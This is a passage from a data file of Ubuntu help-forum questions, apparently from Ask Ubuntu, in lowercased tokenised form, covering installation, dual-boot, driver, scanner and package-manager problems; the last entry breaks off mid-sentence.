356961	how do i get the default font from the command line ?	how can i get the name of the default font ( and default monospace font ) , in the format : ubuntu mono : size=12 : antialias=false i 'm aware of fc-list which gives me a list of all the fonts , but how can i know which one is the default font ? use : i 'm trying to launch xterm like this : xterm -fa ubuntu mono : size=12 : antialias=false and auto-detect the default monospace font .
356962	screenshot context menus/popups	i want to be able to take screenshots of context menus and popups when i hit my hotkeys for taking a selection screenshot , i use the keys alt+shift+ $ for selection screenshot or use my other setup hotkeys alt+shift+âł for window screenshot . these hotkeys and the prt sc key does n't activate the screenshot selections when i press them with a open context menu or popup . i know there 's the scrot -cd 5 command in terminal , but it 's not very practical from just simply being able to take a screenshot of anything with the defined hotkeys or prt sc key . i have searched upon many places and not a single answer to be found on how to make this a function for gnome screenshot , at least add it in so it will just let the use of the hotkeys for screenshots . also read that this is n't even a feature in gnome-screenshot itself for it to even work . would there be any way to actually modify gnome-screenshot to add this function/feature in so i can actually take screenshot of anything or do i have to use an alternative solution like shutter application or scrot until it 's made into a workable featured function ? my hotkeys for taking screenshots are same as what is used on mac osx , and i am using uk english extended keyboard .
356965	ubuntu alongside windows 8 . only win 8 loads	i have a question for you . i am trying to install ubuntu alongside win 8 . the ubuntu 12 lts . in fact , i 've done it . but the problem is that it does not load . so , looking for a fix i discovered the easybcd boot creator . well , when i do that i discovered that the problem will be solved but another one will appear . now the windows boot manager does not load the ubuntu . there 's an error , kind of `` 0x000007b '' telling that there is a problem on an archive `` something.mbr '' if i do remember well . there is something to do with the new efi for what i 've been reading on wherever i go . but i do not find an answer that solves the problem . i 'll be grateful if you can help . thanks a lot !
356968	find the correct php.ini file	i am currently trying to locate the correct php.ini file to edit it and restart apache so the changes will take place and i 'm stumped . what i have done ... i have found three different php.ini files ( no idea why there are three ) this is how i found the files sudo find / -name php.ini it resulted in the following ... . /etc/php5/cli/php.ini /etc/php5/apache2/php.ini /etc/php5/cgi/php.ini i also did ... . sudo php -i | grep 'configuration file' this showed ... . configuration file ( php.ini ) path = > /etc/php5/cli loaded configuration file = > /etc/php5/cli/php.ini i changed all of them ( just to be sure ) to the settings i wanted . i restarted apache using sudo service apache2 restart the results ... * restarting web server apache2 i reloaded the page and it showed that the php.ini file was not updated . i know this becuase i used echo ini_get ( 'post_max_size ' ) ; which was suppose to be changed to 20m but was still only 2m i tried rebooting my computer thinking maybe that would legit stop the apache server and reload the php.ini file with the correct setting , but alas that attempt also failed . is there any chance there could be another php.ini file that could be interfering ? i 'm at a loss and would love some help . any and all help is very appreciated !
356969	lamp installation error : unable to resolve host	i get an error every time i try to install lamp with : sudo tasksel install lamp-server my terminal looks like this : root @ ( none ) : ~ # sudo tasksel install lamp-server sudo : unable to resolve host ( none ) tasksel : aptitude failed ( 100 )
356976	how to remove and prevent libreoffice ppa and updates from installing ?	i have removed libreoffice from my kubuntu system last week . i installed the latest version of openoffice . however , for some strange reason the software center is telling me i have updates for libreoffice . could it be that i still have the ppa for libreoffice install ? can someone please tell me how to remove the libreoffice ppa and prevent the software center from installing libreoffice or any updates for it . i would like to stick with just openoffice . thank you
356979	how to assign a shortcut key to send my system into hibernation ?	i want to assign a shortcut key for the hibernate functionality . i have fn + f11 for hibernation in windows , but it 's not working on ubuntu . it 's getting in sleep mode instead . i 've also tired changing the keyboard shortcut option as ctrl + h with command pm-hibernate , but still it did n't work . i referred this ubuntu forums thread but could n't find any solution for this . any solution please ?
356981	^ @ ^ @ character in syslog	i observe the following strange characters ^ @ in syslog at the time when my machine freezes . then i have to hardboot my machine . what could be wrong any ideas ? oct 12 12:20:52 nanak-p570wm anacron [ 1074 ] : normal exit ( 1 job run ) ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ oct 12 12:24:28 nanak-p570wm kernel : imklog 5.8.11 , log source = /proc/kmsg started . oct 12 12:24:28 nanak-p570wm rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.11 '' x-pid= '' 543 '' x-info= '' http : //www.rsyslog.com '' ] start
356982	problem while installing wireless drivers for ubuntu 12.04	recently i installed ubuntu 12.04 in my machine . it works fine with wired connections but when i want connect to the wireless its started showing some updates like broadcom sta wireless driver . i could n't update and it 's showing error message ( please have a look log files for details : /var/log/jokey.log ) . please help me to sort out this problem .
356986	how to reinstall ubuntu from flash drive	i am using ubuntu 13.04 and wish to reinstall ubuntu using a usb flash drive . currently my computer is set up to dual boot with windows 7 and ubuntu , where grub comes up when i boot the computer i can choose either . is there an easy way to remove windows completely and reinstall only ubuntu ? i have all files backed up so i would prefer to just reinstall the os from scratch
356989	will bf4 beta work with 13.04 ?	i would like to know if battlefield 4 beta will work with ubuntu 13.04 ( 64 bit ) . if it does will someone tell me how to do it ? thanks
356991	installing ubuntu on vmplayer	i am a newbie to vmplayer and ubuntu . i have downloaded the vmplayer version 5.x and ubuntu iso file and the install completes but the gui is not launching , the unity mode is not working and when i try to installvmwaretools it gives me the message saying `` make sure you are logged in to guest operating system.mount the virtual cd drive in guest , launch a terminal and use tar to uncompress installer '' . any suggestions ? i have tried to do the same with vmplayer 6.x as well no luck . some forums i saw that it will automatically launch a firefox nothing happens in my case . also this the error in the log 013-10-11t22:43:59.398-04:00| vcpu-0| i120 : tools install 'c : \program files\linux.iso ' not present or not readable 2013-10-11t22:43:59.399-04:00| vcpu-0| i120 : msg_post : warning 2013-10-11t22:43:59.399-04:00| vcpu-0| i120 : [ msg.tools.inaccessible ] unable to install vmware tools . an error occurred while trying to access image file `` c : \program files\linux.iso '' needed to install vmware tools : the system can not find the file specified . 2013-10-11t22:43:59.399-04:00| vcpu-0| i120+ if your product shipped with the vmware tools package , reinstall vmware player , then try again to install the vmware tools package in the virtual machine .
356992	how do i disable the cinnamon 2 lock screen ?	when my computer is locked , i am presented with the default ubuntu lockscreen . when i enter my password and unlock it , i am presented with the cinnamon 2 lock screen and i have to enter my password again . how can i disable the cinnamon 2 lock screen ? note : i 've installed cinnamon 2 with these commands : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon
356995	is it possible for two users to login at same time	hello friends as i was thinking is it possible for two users to login at the same time in the same machine with multiple monitors can we do it or not and if we can please supply the handy information
356997	install 32-bit java along with 64-bit	while i was trying to connect a network i got a message that i should install 32-bit java with update-alternatives . i have 64-bit java already installed . how can i do this ?
356998	something wicked happened resolving medibuntu repository , what happens ?	we have an ubuntu 12.04 lts machines that is giving errors when i try to run updates . specifically , i am getting a load of errors like this : w : failed to fetch http : //packages.medibuntu.org/dists/precise/non-free/i18n/translation-en something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) i tried to ping packages.medibuntu.org , and it returns : ping : unknown host packages.medibuntu.org it therefore seems to me that sometime in the past , packages have been installed from there , but it has 'gone away ' . questions : is that diagnosis correct ? if so , how do i identify and 'fix ' those packages ? do i have to carefully go through the whole output from 'apt-get upgrade ' and uninstall each one ? hope not , but if that 's what 's required , then okay .
357001	/etc/environment : line 2 : path : no such file or directory	i 'm running ubuntu 12.04 . recently i 've noticed that ubuntu software centre fails to install/remove packages to/from my computer . here is the error description . installarchives ( ) failed : setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 2 : /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/bin : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : install-info error in function : setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 2 : /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/bin : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 following is the image for same : what is the reason for this and how can i fix this ? output of cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' classpath= `` /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/bin ''
357002	get my app , having a kernel module , accepted by the review process of the ubuntu software center	i have submitted an app divided in 3 parts : a kernel module a daemon a control panel the first and last parts are free and open source , and packaged in a ppa . the second one is closed source , and this is the part i want to sell trough the ubuntu software center . my app is -- as of now -- rejected due to the kernel module , and the fact that it is not on a safe place ( ppa ) as the reviewer told me . when i have tried to publish the free and open source parts in the usc , i got the following message : thank you for submitting a gratis free software application through myapps . at this time we are unable to process this request , as we are working on the implementation of a new app upload process . to get your software out to millions of ubuntu users in the meantime , you can either use a personal package archive to distribute your app for free , or you can define a price to charge for your app . i am now looking for a solution ( as he did n't gave me any directions ) . how could i do to get my app accepted ? anyone has an idea ?
357004	how to select apache2 during phpmyadmin installation on ubuntu 13.04	i 'm trying to install phpmyadmin on an ubuntu 13.04 installation , i see the option to install apache2 but i can not put a * in between the [ ] like it shows . if i just press enter then apache2 does not get installed . how do i [ * ] ? here is a picture of the screen :
357005	how to recover lost google chrome icons after deletion of the configuration ?	i had deleted google-chrome configuration ( sudo rm -r ~/.config/google-chrome ) and uninstalled google chrome . after re-installing it i noticed that the extension are not working and there icons are missing . how do i make then sync again or make then work again ? ?
357006	retrieving proprietary drivers removed from the software centre	ubuntu was not recognizing my canon mg6360 as a scanner . i started to uninstall and re-install the drivers scangearmp-source-2.00-1 and scangearmp-mg6300series-2.00-1-deb using the software centre . however , once they were removed , they disappeared from the software centre . how do i get them back ?
357007	start ubuntu 13.04 from preinstalled window 8	i have a dell inspiron 1012 mini laptop . it came with window 8 preinstalled . i installed ubutu 13.04 from usb but the problem is that at boot time there is no sign of grub loader and i ca n't see any list of operating system so that i can select ubuntu . by default window 8 i loaded . i have window 8 installed in my c drive and ubuntu in d drive as well as boot loader for ubuntu is also in d. at the time of installation there were 3 options : first was replace window 8 with ubuntu , second was erase all & third was something else and i installed ubuntu using 3rd option i searched a lot on net but did n't find a correct solution for me . please help me to get rid of this situation . thanks in advance .
357010	how to open external drive from remote location ?	i have an external hard drive mounted on my server running ubuntu 12.04 lts ( server ) . whenever my system restarts i click on the icon appearing within /media/mydisk and my external drive starts appearing in df -h. before clicking , my external drive does not appear . my problem is i had to reboot my system from a remote location , therefore after rebooting , my external drive does not appear within df -h. by mistake i ran mkfs.ext4 at the partition accessible from cat /proc/partitions . now i fear that my data might have got deleted . is it true ? also how can i access my external drive within /media/mydisk from a remote location without requiring to open /media/mydisk physically ?
357020	ubuntu 12.04 lts heats laptop	my toshiba satellite l630-104 ( intel core i3 m330 @ 2.13 ghz , 3gb ram ) , overheats badly using ubuntu 12.04 lts . am using ubuntu in dual booting mode , heating doesnât happen with window 7 . am new to ubuntu & quite excited to use/learn but on couple of instance machine shut automatically due to overheat , it shoots up beyond 75c . after browsing for solution on internet , installed jupiter/gnome classis profile and now temperature ranges from 60 to 65 . is this healthy temperature , is there any other fix with which heating can be refused ?
357023	why can not texmaker find latex ?	i installed texlive into /opt/texlive . also i 've added the path of latex to $ path in ~/.bashrc . thereafter i installed texmaker . i launched texmaker by searching in unity dash . but when compiling the .tex files , texmaker fails to find latex . what should i do ?
357035	asrock 970 extreme4 motherboard compatibility	is asrock 970 extreme4 compatibility with ubuntu ?
357037	install efi-mode grub2 on ubuntu booted from legacy-mode	i have searched for many posts and try some . i would like to install efi-mode grub on my usb hdd on ubuntu , but methods i found did not work . finally i read a post that said efi-mode grub can only be installed when ubuntu was booted from efi-mode , but not legacy-mode . yet i do not have ubuntu dvd . thus i would like to ask if there are any solutions to to install efi-mode grub when ubuntu was booted from legacy-mode . thank you very much .
357039	disable the ability to switch to ttys ( ctrl+alt+f1 ... f6 )	disable swtichting to terminals ttys using ( ctrl+alt+f1 ... f6 ) in ubuntu ? !
357043	about ubuntu software centre	i 've installed ubuntu 12.04 using windows ubuntu installer.i am trying to get softwares from ubuntu software centre but it is giving option 'more info ' and not being installed . what to do in this case ?
357046	bandcamp.com player looks like it loads in firefox , but does n't respond . flash works fine on youtube	bandcamp.com player 's seems to load in firefox , but does n't respond . flash works fine on youtube . bandcamp works normally in rekonq .
357047	how to create realtek 9182ce driver dkms module	on kernel 3.2.0 , the build in drivers stopped working arround 3.2.0-40 as reported in bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/902557 . i wonder if the kernel change git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/âś caused the drivers to break in 3.2.0 . - it happened around that date . i tried creating a dkms package with the drivers from realtek ( version 0012.0207.2013 ) . i 've put the code and dkms.conf on https : //code.google.com/p/realtek-8192ce-dkms-wireless-drivers-ubuntu-1204-kernel-3-2-0/source/browse/ # git % 2fr8192ce-0012.0207.2013 installing the drivers with make , make install works performing dkms add , dkms build , dkms mkdeb all goes without any error message . rebooting results in non working wifi . the only error message i find in dmesg is `` rtlwifi : disagrees about version of symbol module_layout '' . i found on groups.google.com/forum/ # ! msg/beagleboard/tjd61xsleue/âś `` means that the module was compiled against a different kernel than the one you are trying to run . '' - i thought the whole point of dkms was that the driver would get recompiled when a new kernel is installed.. i deleted /lib/firmware/rtlwifi/rtl8192cfw.bin , which was the old firmware , to make sure only the new firmware is available on the system . the error message did not change . it must have something to do with dkms.conf . when i do make , makeinstall in my /usr/src/r8192 ... folder , the drivers work . i created the deb package using -- source only . i know there are drivers in the kernels with higher version numbers , but i have to stay on this lts kernel , because of the cedartrail drivers that only work on that kernel . at the moment , i use a dkms package for the 0007 driver , but they do n't perform wel : dropouts , slow , negative impact on the whole wifi network . the computers are intel classmate based pupil 103 . i have 228 of them , so replacing the wifi card is not really an option : - ( edit i see now that the new driver is loaded , but not the new firmware . in other words : @ cp -fr firmware/rtlwifi/ $ ( firmwaredir ) / from the make file is not executed when building the module using dkms , while it is executed while running make , make install . edit 2 i made a postinstall script to copy the firmware in place . when running dkms add , build , install , the drivers work : - ) but when making a debian package of the dkms module , the firmware is again not copied to the right location . the postinstall script just contains cp -fr firmware/rtlwifi /lib/firmware/ so nothing fancy . the postinstall script is not put in the debian package by dkms mkdeb . i must be missing the obvious here . can any dkms-guru shine his/her light on it please ? nearly there .
357048	how to install gnome shell with jhbuild	can you give me instructions on installing gnome shell in 12.04 with jhbuild ? i want to install gnome shell 3.8 . thank you !
357049	how to implement graphing top 5 cpu consumers like new relic in open source ?	does anyone know how to implement graphing top 5 cpu or memory consumers like new relic does in open source ? http : //blog.newrelic.com/2012/08/29/you-asked-we-delivered-introducing-windows-server-monitoring/ thanks , gm
357052	installing 12.04lts wubi in windows 7	after downloading wubi 12.04 lts and installing on windows 7 , the error problem appeared like these : kernel panic - not syncing : attempted to kill init ! exitcode=0x00000100 drm_kms_helper : panic occured , switching back to text console . please help me about those trouble above .
357053	how does software update works ?	i am interested in knowing how software update works ( technically ) . what all are the components that checks , downloads and installs new update and how do they work .
357057	no option to start ubuntu os after installtion	i successfully installed ubuntu however , every time i startup my lapyop it goes straight to windows 8 os . i cant find the option to switch os in the bios screen . please help ! ! !
357059	manual installation . where do i start ?	i have never done any actual manual installation , since i started using ubuntu 2 years ago . i 'm trying to install some updates , little by little . i 'm using my blackberry to download and transfer all the updates needed as well as restricted drivers . i tried everything i found on google , like : sudo apt-get *file location* . *extensions* and all other commands.. i would like to know , how i can install everything without internet . main reason without internet is my toshiba c855d-s5303 ( satellite ) will crash upon connection with wifi . i have the ubuntu system run off of a usb 3.0 connection , i have tested it beforehand to make sure it stood up to the standard hardware reqs . of speed it needed to run . and if there is a fix for the wifi crash ( downloadable and transferable ) that would be more greatly appreciated . its also a fresh install .
357062	my window 7 is not showing in booting	i am using window 7 and ubuntu 12.04 at the same time . after update ubuntu my window 7 is not showing in the boot loader plz help me
357065	how to get my theme settings back after update ?	i did a dist-upgrade yesterday and it appears to have broken my gtk theme ( and touch pad scrolling + tap and font preferences ! ) . e.g . firefox prefs dialog : i know it 's my settings because if i create a new user , everything is ok . but i do n't want to recreate my user account just to get the desktop to behave . changing the theme settings in `` advanced settings '' ( tweak ) now has no effect . how can i reset the gnome/desktop config ? i 'm using gnome shell .
357067	problem running jekyll	i try to run jekyll but i can the error : /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : /usr/lib/ruby/vendor_ruby/jekyll.rb:131 : syntax error , unexpected ' ) ' , expecting keyword_end ( syntaxerror ) yaml active_support/inflector ) .each { |g| require g } /usr/lib/ruby/vendor_ruby/jekyll.rb:135 : module definition in method body /usr/lib/ruby/vendor_ruby/jekyll.rb:229 : syntax error , unexpected $ end , expecting keyword_end from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/bin/jekyll:20 : in ' < main > ' please , please help .
357068	ubuntu 13.04 and garmin 405 ant+	how do i get ubuntu 13.04 to recognise the garmin 405 ant+ usb device so i can download data from the garmin 405 to python trainer or garmin connect . any help would be appreciated . many thanks
357072	how to run ubuntu touch on hp slate 21 inch tablet running jelly bean	i have an hp slate 21 running android jelly bean that needs something like ubuntu on it to make it useful . i accept i need to root it and risk bricking it but it 's not much use as it stands so not much lost i have some but not a lot of computer knowledge so need detailed help
357073	how to open new tab in existing window using keyboard shortcuts on ubuntu	keyboard shortcut ctrl+alt+t opens a new terminal window on linux . by default it opens 1 new terminal window . is there a way how to customize how many new tabs are going to be opened ? e.g . by using this shortcut it will open 2 tabs by default . what is the right keyboard shortcut to open a new tab in existing terminal ? i want to have 2 tabs opened and switch between them with ctrl+page up .
357077	which is the ideal way to install ubuntu in a usb stick	i know that i can run ubuntu from a usb stick using an iso and some software like unetbootin.also , i can install the iso using the installer in the live session in a usb stick.i am wondering if what is the best or ideal way to have a portable ubuntu in which i could save any changes and have a reasonable speed . i found that using toram option could speed up the system by loading everything in ram . unfortunately , they say , it does n't work with persistence option .
357079	why ca n't i restore from backup files	i was using ubuntu 12.4 and made a back up of all my files ( on a portable hd ) using the system backup utility . i have made a clean install of ubuntu 13.04 and now want to restore my data . te backup utility restore function says `` no backups to restore '' although i can see over a thousand volumes of compressed duplicity folders are present . how can i reinstall this data ?
357088	problem in accessing the desktop/home on ubuntu	dear users i was working on ubuntu 12.04 properly but some days ago when i shutdown my laptop i did n't get my desktop/home back . only black screen appears . some time it ask username/password and i can only access terminal but not in a proper way . i do not know what happened ? can anyone please assist me ? ? best regard
357089	i can open gwibber , however i can not get the account adding page open . is there a command line or shortcut for this ?	i recently installed gwibber to my ubuntu laptop ( 12.04 ) but it wont allow me to add my accounts . it doesnt open a new page , and it doesnt show the page for account addition . what do i do ?
357090	indicator synapse in tint2	i 'm using openbox with tint2 in ubuntu 13.04 is there a way to make indicator synapse ( indicator-synapse ) to appear in the systray area ? i do n't know why it appears in unity but here it does n't , because most of the apps appear normally in tint2 systay
357091	installing ubunto 12.04.3 uefi/csm problems	i 'm new to ubunto , and i 'm not a computer person so i am having ( maybe simple ) problems installing it . i downloaded ubunto 12.04.3 64 bit from this site ( i have a toshiba p850 i7 so it is a new laptop thats why i chose 64 bit ) , and i mounted it on a usb using universal usb installer . i tried booting from usb with uefi on , but i got a black screen with gnu grub , and a grub > command line . i tried rebooting but with uefi off ( csm ) , it normally booted , but it didnt detect my windows 8 operating system . i suppose thats because i booted with uefi off . i need my pc to duel boot , so i want ubunto to be installed with uefi on . i read some of the questions/answers here , but it didnt help me much ( mainly because im not a computer person ) . so please i need some modest help concerning my problem
357099	why my ( sb 0106 ) soundcard is stopped the work ?	after a few weeks of non usage , recevied some update ... . my sound blaster 0106 ( audigy 1 ) is stopped to work . on the screen the sound card reports no errors , but no sound comes out from the card . i am record it , let me show what i see : http : //www.youtube.com/watch ? v=kjr7sc_fivy
357100	problem during updating ubuntu	reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_quantal-backports_restricted_i18n_translation-en % 5fin e : the package lists or status file could not be parsed or opened .
357101	owner of /usr/lib is not root	virtualbox program error : failed to open a session for the virtual machine ... . failed to load vmmr0.r0 ( verr_suplib_owner_not_root ) . terminal output : balazs @ inspiron : /usr $ ls -l total 164 drwxr-xr-x 2 root root 69632 oct 12 12:27 bin drwxr-xr-x 2 root root 4096 apr 24 19:04 games drwxr-xr-x 81 root root 12288 sep 29 11:57 include drwxr-xr-x 200 balazs balazs 36864 oct 12 12:27 lib drwxr-xr-x 4 root root 4096 may 23 10:43 lib32 drwxr-xr-x 12 root root 4096 oct 3 14:02 local drwxr-xr-x 2 root root 12288 oct 10 19:17 sbin drwxr-xr-x 337 root root 12288 oct 12 12:27 share drwxr-xr-x 11 root root 4096 oct 12 12:27 src i did n't changed anything . maybe some other installed software screwed things up . but i think /usr/lib should be owned by root . inside the folder everything is owned by root . balazs @ inspiron : /usr/lib $ ls -l | less total 196232 drwxr-xr-x 2 root root 4096 apr 24 19:03 accountsservice drwxr-xr-x 7 root root 4096 jul 16 12:49 adm_plugins drwxr-xr-x 3 root root 4096 apr 24 19:04 aisleriot drwxr-xr-x 2 root root 4096 apr 24 19:04 apg drwxr-xr-x 2 root root 4096 may 28 01:50 apr-util-1 drwxr-xr-x 4 root root 4096 apr 24 19:02 apt drwxr-xr-x 2 root root 12288 apr 24 19:03 aspell drwxr-xr-x 2 root root 4096 apr 24 19:03 at-spi2-core -rw-r -- r -- 1 root root 34512 jul 11 07:51 attica_kde.so drwxr-xr-x 2 root root 4096 apr 24 19:04 avahi how should i fix this ? i fear i 'll break my os . i did sudo chown on that folder once and i had to reinstall everyting because sudo was n't owned by root etc . ( a year ago ) i decided not to use virtualbox , but now i need it . any help ?
357104	audio strreaming over network using pulse api	i planning to set up local area network for playing audio . so that sound played on speaker should also play to remote desktop machine at same time . i know pulseaudio support network streaming of audio but i google it , many of people suggesting shell scripting but i want to write my own c code for this purpose . i read pulse audio api documentation but their is no header file for using network utility of pulse.so please suggest me documentation or else simple code for streaming over network . thanks in advance ... ... .
357107	how to play vmodsynth with the keyboard ?	is there any possibility to play with the vmodsynth on my computer keyboard ? i do not have any external midi devices , unfortunately . or , maybe , can i import it somehow into lmms ( that would be the greatest ) ?
357108	installation of ubuntu 12.04 64bit on msi gt70 2oc	ok so my problem is i ca n't install the 64 bit version of ubuntu on my system , i have tried every bios config shown in threads but it stops on the screen after selecting install ubuntu . i 'm installing via usb i have tried using legacy mode and uefi both with fast boot on and off . the strangest thing is i can install the 32bit version via legacy mode no problems system specs are as follows , core i7-4700mq nvidia gt770m 3gig 32gig ram 128gig ssd as os drive 750gig hdd as back-up drive let me know if you need any more details , i have not been able to find any threads that are even close to my problem
357109	ubuntu 13.04 is not shutting down and also i can not open another os too	got my lap lenovo g580 , installed ubuntu 13.04 with the existing os windows 8 . now ubuntu is running fine but i can not boot through windows 8. and also ubuntu is not shutting down , neither it go off , nor its hang , in fact after i can use pc as usual . i 've to always use sudo shutdown -h -q now for power off . kindly suggest : why its not shutting down , why its unable to shut graphically ( shutdown click ) why i am unable to bootup with any of the os .
357110	fujitsu s1300i advances document but does n't scan	i 'm using a fujitsu scansnap s1300i . sudo sane-find-scanner ( using sudo as a temporary workaround to minimise any permissions problems ) returns : found usb scanner ( vendor=0x04c5 [ fujitsu ] , product=0x128d [ scansnap s1300i ] ) at libusb:001:004 so i edited /etc/sane.d/epjitsu.conf and added : firmware /usr/share/sane/epjitsu/1300i_0d12.nal usb 0x04c5 0x128d and copied 1300i_0d12.nal from a windows install into /usr/share/sane/epjitsu/ . ( actually i copied all the *.nal drivers , just in case it needed one of the others . ) running sudo scanimage -l returns : device `epjitsu : libusb:001:004 ' is a fujitsu scansnap s1300i scanner however running sudo scanimage returns : scanimage : output is not a file , exiting and running sudo simple-scan , skanlite or gscan2pdf all advance the document feed by a couple of centimetres , but then the feed halts and the frontend returns an i/o error of some kind . so sane seems to recognise the scanner and has some basic communication with it ( the paper advances a couple of centimetres ) , but it does n't scan . any suggestions about something i 've missed out or how to get a proper scan output ? additional info ( 1 ) scanimage -v returns : scanimage ( sane-backends ) 1.0.23 ; backend version 1.0.23 ( 2 ) sudo skanlite gives an error message : qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . ( 3 ) if i run sudo scanimage -v ( i accidentally typed lowercase v when i was trying to obtain the version ! ) after the document has been advanced a couple of centimetres by sudo skanlite , then the scanimage command forces a complete document feed -- but no scan .
357112	which ubuntu derivative for my netbook ?	i have an lenovo ideapad s10-2 like this processor / chipset cpu intel atom n270 / 1.6 ghz cache l2 cache - 512.0 kb front side bus 533.0 mhz chipset mobile intel 945gse express features hyper-threading technology ram 2.0 gb ddr2 sdram 533.0 mhz / pc2-5300 form factor so dimm 200-pin audio & video graphics processor intel gma 950 memory allocation technology dynamic video memory technology 3.0 which ubuntu derivative should i use for best driver and device performans compatibility im a general purpose user frequently surf on internet , sometimes i need remote desktop connection , office extension document files , and video multimedia files . your suggestions are very important for me because windows slow down my system heaps of times.. so i want to use ubuntu anymore . thanks in advance , best regards
357113	automatically regenerated .fuse_hidden928347928374 files when i try to delete my own	i have an ntfs volume mounted under linux , and periodically , after i 've deleted a file of my own , a clone of it will appear in the directory where the actual file was . i can usually delete this file , but it immediately comes back . if i try to run rm -rf parent/ , it does n't allow me to . i usually have to wait 20 minutes or so and go do other things before i can successfully delete the directory without the file being there . what 's going on here , and what can i do about it , since it 's quite annoying .
357116	how to change the color depth in lubuntu to 24-bit ?	i just installed lubuntu 13.04 on a very old pc of mine . intel p4 2.6 ghz processor some local made motherboard 40 gb / 512 ram . the color depth seems to stuck in 8 bit mode . how to change it to 24bit ?
357118	wifi on one laptop makes connection on other devices very slow	i have a dell vostro 3500 laptop with ubuntu 13.04 installed . wheenever this laptop is on wifi network , it makes the connection on all other devices ( mac , android , windows ) using same network very slow , so much that even a simple browser page does not load on other devices . this happens everytime . i looked at the issue at : one ubuntu laptop on wifi occasionally makes other laptop 's connection slow but do not know if that is applicable in my case or what i should be doing as the configuration ( os as well as wl kernel ) is different from that case . my information is as follows : $ sudo lspci -nnk | grep -a8 -i network 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 [ 1028:0010 ] kernel driver in use : wl 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : dell device [ 1028:0441 ] kernel driver in use : r8169 ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 05 ) subsystem : intel corporation device [ 8086:8086 ] ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 05 ) kindly let me know what is the best way to resolve this . if you could give me steps that would be great
357120	how to safely build a source that is already installed ?	i have varnish 3.0.2 installed on the ec2 instance that hosts the dev of an ror app i want to install geoip-vmod . for that i need to run ./configure varnishsrc=dir . i did n't have the varnish source on the ec2 , so i downloaded it from here . then , on running ./configure varnishsrc=../varnish-3.0.2 i 'm getting the following error : checking for /root/geoip/varnish-3.0.2/include/varnishapi.h ... yes checking for /root/geoip/varnish-3.0.2/bin/varnishtest/varnishtest ... no configure : error : in `/root/geoip/geoip-vmod ' : configure : error : ca n't find `` /root/geoip/varnish-3.0.2/bin/varnishtest/varnishtest '' . please build your varnish source directory see `config.log ' for more details i dont want to mess up with the varnish that is already installed , by building varnish from the source i downloaded . how can i safely build varnish from the downloaded source ?
357123	ubuntu 13.04 wifi not working after installation inspiron 5520	hi guys i just installed ubuntu 13.04 on my dell inspiron 5520 laptop the wifi worked fine when i booted from the live cd and installed it got the timezone and some updates too . but after installation there is no trace of wifi connectivity . also the bluetooth settings seems to be just for show . it wont detect any other device and i cant find it on any other device i ran sudo lshw -c network and the output was *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 05 serial : d4 : be : d9:2d : d7:49 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : c1404000-c1404fff memory : c1400000-c1403fff *-network unclaimed description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c1500000-c1507fff ` also i ran lspci | grep -i 